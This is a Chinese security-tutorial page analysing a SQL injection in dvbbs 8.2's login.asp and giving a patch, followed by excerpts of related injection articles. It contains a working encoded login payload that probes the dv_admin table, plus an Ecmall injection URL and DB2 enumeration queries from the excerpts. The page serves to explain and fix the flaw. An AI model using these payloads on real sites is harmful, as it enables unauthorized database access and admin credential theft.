dvbbs 8.2 SQL Injection注射漏洞分析_安全教程

password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
就可触发.

漏洞分析:动网在asp领域也算一个比较元老的程序,这次在8.2新版里有一个低级的错误.漏洞代码在login.asp 118行左右

......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = unescape(username)
......
取得的username是先经过检查然后再unescape解码,导致用urlencode模式就可以饶过任何检查,和php的urldecode导致的注射很类似,譬如用%2527就可以提交'过去了.

修补方案:修补也很简单,将上述代码改成

......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = trim(Dvbbs.CheckStr(unescape(username)))
......

时间: 2025-01-29 22:25:57

dvbbs 8.2 SQL Injection注射漏洞分析_安全教程的相关文章

SQL Injection with MySQL 注入分析_安全教程

声明 本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有代码均为本人所写,所有数据均经过测试.绝对真实.如果有什么遗漏或错误,欢迎来安全天使论坛和我交流. 前言 2003年开始,喜欢脚本攻击的人越来越多,而且研究ASP下注入的朋友也逐渐多了起来,我看过最早的关于SQL注入的文章是一篇99年国外的高手写的,而现在国外的已经炉火纯青了,国内才开始注意这个技术,由此看来,国内的这方面的技术相对于国外还是有一段很大差距,话说回来,大家对SQL注入攻击也相当熟悉了,国内各大站点都有些堪称

Ecmall最新SQL注射漏洞分析

你的域名/index.php 土淘网 用的Ecmall的建站模板,用过这个模板的应该都通杀了吧 存在搜索框注入,注入点为: 你的域名/index.php?app=store&act=search&id=45&keyword=aaa&min_price=100&max_price=10000 首先将获取get传来的参数,然后组合到一个sql查询语句condition中: 1.search.app.php中的这段代码就是构建查询min和max价格的sql代码,没有过滤:

Sql Injection in DB2数据库_漏洞研究

使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手.不过在网上很难找到相关的资料,只好自己研究了.  参考了IBM DB2的文档,总结了这样几条:  1.select NAME from SYSIBM.SYSTABLES where CREATOR =USER  可以返回系统中所有用户创建的表(table)名  2.select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME=''   返回表中的列名 

正则表达式(regex)错误使用导致功能漏洞分析_正则表达式

写在前面的话 正则表达式它的强大字符串匹配功能,导致目前在各种程序语言中,都非常流行!它被用来描述或者匹配一系列符合某个句法规则的字符串.很多刚刚使用正则表达式都是从听说这个,然后在要使用时候去网上搜索. 很少人一开始就系统去学习正则表达式,从定义原理使用系统学习.因为,对应初学者觉得它太麻烦了,好多原字符.看到那么长一串字符,就很头痛.因此,也懒得去学习.一般遇到问题,直接去网上搜索.如:"邮箱正则表达式,手机号正则表达式,url正则表达式-.." ,我们发现一个很有意思现象,&qu

asp.net使用LINQ to SQL连接数据库及SQL操作语句用法分析_实用技巧

本文实例讲述了asp.net使用LINQ to SQL连接数据库及SQL操作语句用法.分享给大家供大家参考,具体如下: LINQ简介 LINQ:语言集成查询(Language INtegrated Query)是一组用于c#和Visual Basic语言的扩展.它允许编写C#或者Visual Basic代码以查询数据库相同的方式操作内存数据. LINQ是一门查询语言,和SQL一样,通过一些关键字的组合,实现最终的查询. LINQ的分类 LINQ to Object LINQ to XML LIN

局域网用户的限制和反限制设置方法与思路分析_组网教程

可能现在对局域网上网用户限制比较多,比如不能上一些网站,不能玩某些游戏,不能上MSN,端口限制等等,一般就是通过代理服务器上的软件进行限制,如现在谈的最多的ISA Server 2004,或者是通过硬件防火墙进行过滤.下面谈谈如何突破限制,需要分限制情况进行说明:  一.单纯的限制某些网站,不能访问,网络游戏(比如联众)不能玩,这类限制一般是限制了欲访问的IP地址. 对于这类限制很容易突破,用普通的HTTP代理就可以了,或者SOCKS代理也是可以的.现在网上找HTTP代理还是很容易的,一抓一大把

用PHP函数解决SQL injection

函数|解决 SQL injection问题在ASP上可是闹得沸沸扬扬当然还有不少国内外著名的PHP程序"遇难".至于SQL injection的详情,网上的文章太多了,在此就不作介绍.如果你网站空间的php.ini文件里的magic_quotes_gpc设成了off,那么PHP就不会在敏感字符前加上反斜杠(\),由于表单提交的内容可能含有敏感字符,如单引号('),就导致了SQL injection的漏洞.在这种情况下,我们可以用addslashes()来解决问题,它会自动在敏感字符前

Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范_漏洞研究

一.概述    漏洞介绍: http://coolersky.com/leak/programme/bbs/2006/0515/515.html     前几天就听Hak_Ban说有人把dvbbs7的一个注入漏洞给发布出去了,一直也没时间看看,下午跟Edward要了个链接看了看: http://www.eviloctal.com/forum/read.php?tid=22074     本站转贴为: http://coolersky.com/articles/hack/analysis/prog

再谈ASP防止SQL Injection漏洞的问题

问题 再谈ASP防止SQL Injection漏洞的问题 /**作者:慈勤强Email: cqq1978@Gmail.com*/ 关于Asp的SQL Injection预防问题,似乎已经没什么可说的了.在我做的Asp的项目里面, 都是用自己写的函数来处理客户端提交进来的数据,我的Blog里面也贴过这个函数. 具体可以参考http://blog.csdn.net/cqq/archive/2004/09/23/113786.aspx 不过,从朋友的留言和网上其他的一些讲如何防范SQL Injecti